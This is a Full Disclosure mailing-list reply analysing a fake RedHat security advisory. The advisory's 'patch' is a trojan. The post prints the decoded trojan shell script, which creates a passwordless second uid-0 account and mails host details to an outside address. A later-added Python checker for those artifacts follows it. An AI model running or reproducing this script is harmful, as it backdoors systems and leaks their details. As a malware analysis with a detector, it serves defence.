Full Disclosure mailing list archives
Re: FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"
From: Andrew Farmer <andfarm () teknovis com>
Date: Sun, 24 Oct 2004 18:18:41 -0700
Hugo van der Kooij wrote:
Be advised. The message below is currently going around on the internet. Being unsigned was the first obvious issue. Not pointing to RPM updates, being in a different format and such were among the other reasons to suspect it. Message was sent from 'University of Texas at Arlington'. I am sure none of you should be fooled by such a message but others might be. And while it lasts you may want to get the file for your own educational purposes.
<snip>

I did a quickie analysis of the program (which is basically just distributed as source!).
Strings are encrypted with arcfour; however, as the keys are included too, decrypting them is no problem.
pswd[] is an initialization vector for arcfour.
shll[] decodes to: /bin/sh
inlo[] decodes to: -c
xecc[] decodes to: exec '%s' "$@"
lsto[] decodes to a null string.
chk1[] decodes to: KTZE4lIVf7i4BR
opts[], text[], and chk2[] are encrypted with some (apparently constant) data retrieved by statting /bin/sh.
To cut to the chase, the whole thing ends up clearing the screen and running the following shell script:
#!/bin/sh
cd /tmp/
clear
if [ `id -u` != "0" ]
then
echo "This patch must be applied as \"root\", and you are: \"`whoami`\""
exit
fi
echo "Identifying the system. This may take up to 2 minutes. Please wait ..."
sleep 3
# Marker directory (nine ". " components) shows whether this host was already done
if [ ! -d /tmp/." "/." "/." "/." "/." "/." "/." "/." "/." " ]; then
echo "Inca un root frate belea: " >> /tmp/mama
# Second uid-0 account named "bash", then its password is removed
adduser -g 0 -u 0 -o bash >> /tmp/mama
passwd -d bash >> /tmp/mama
ifconfig >> /tmp/mama
uname -a >> /tmp/mama
uptime >> /tmp/mama
sshd >> /tmp/mama
echo "user bash stii tu" >> /tmp/mama
# Host details are mailed out, then the log and marker are handled
cat /tmp/mama | mail -s "Inca o roata" root () addlebrain com >> /dev/null
rm -rf /tmp/mama
mkdir -p /tmp/." "/." "/." "/." "/." "/." "/." "/." "/." "
fi
# Fake progress bar shown to the victim
bla() {
sleep 2
echo -n "#"
sleep 1
echo -n "#"
sleep 1
echo -n "#"
sleep 2
echo -n "#"
sleep 1
echo -n "#"
sleep 1
echo -n "#"
sleep 3
echo -n "#"
sleep 1
echo -n "#"
sleep 4
echo -n "#"
sleep 1
echo -n "#"
sleep 1
echo "#"
sleep 1
}
echo "System looks OK. Proceeding to next step."
sleep 1
echo
echo -n "Patching \"ls\": "
bla
echo -n "Patching \"mkdir\": "
bla
echo
echo "System updated and secured successfuly. You may erase these files."
sleep 1
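As an added example (not part of Andrew's message or the trojan's source), a small host-side check for the artifacts the script above leaves behind: a second uid-0 account with an empty shadow password, and a disguised dot-and-whitespace directory under /tmp. The passwd, shadow and /tmp listings embedded here are constructed sample data; the functions accept real file contents as well.

```python
import re

# Constructed sample files reflecting a host where the trojan's
# 'adduser -g 0 -u 0 -o bash' and 'passwd -d bash' have run.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
bash:x:0:0::/home/bash:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
"""
SAMPLE_SHADOW = """root:$6$constructedsalt$constructedhash:19000:0:99999:7:::
bin:*:19000:0:99999:7:::
bash::19000:0:99999:7:::
alice:$6$constructedsalt$anotherhash:19000:0:99999:7:::
"""
# Constructed /tmp listing; '. ' (dot plus space) is the marker the script creates.
SAMPLE_TMP = [".X11-unix", ". ", "build-1234", ".", ".."]


def parse_colon_file(text):
    """Split passwd/shadow style text into field lists, skipping blanks and comments."""
    return [line.split(":") for line in text.splitlines()
            if line.strip() and not line.startswith("#")]


def extra_uid0_accounts(passwd_text):
    """Accounts sharing uid 0 with root: the 'adduser -o' duplicate-uid trick."""
    return [f[0] for f in parse_colon_file(passwd_text)
            if len(f) >= 3 and f[2] == "0" and f[0] != "root"]


def empty_password_accounts(shadow_text):
    """Accounts whose shadow hash field is empty, i.e. login without a password."""
    return [f[0] for f in parse_colon_file(shadow_text)
            if len(f) >= 2 and f[1] == ""]


def disguised_tmp_entries(names):
    """Entries named only with dots and whitespace, which hide from a casual ls."""
    return [n for n in names if n not in (".", "..") and re.fullmatch(r"[.\s]+", n)]


def scan(passwd_text, shadow_text, tmp_names):
    """Collect all indicators; an empty dict means nothing matched."""
    findings = {
        "uid0_duplicates": extra_uid0_accounts(passwd_text),
        "empty_passwords": empty_password_accounts(shadow_text),
        "disguised_tmp": disguised_tmp_entries(tmp_names),
    }
    return {k: v for k, v in findings.items() if v}


if __name__ == "__main__":
    for kind, items in scan(SAMPLE_PASSWD, SAMPLE_SHADOW, SAMPLE_TMP).items():
        print(f"{kind}: {items}")
```

On a real host, feed `scan()` the contents of /etc/passwd and /etc/shadow (root needed for the latter) and `os.listdir("/tmp")`.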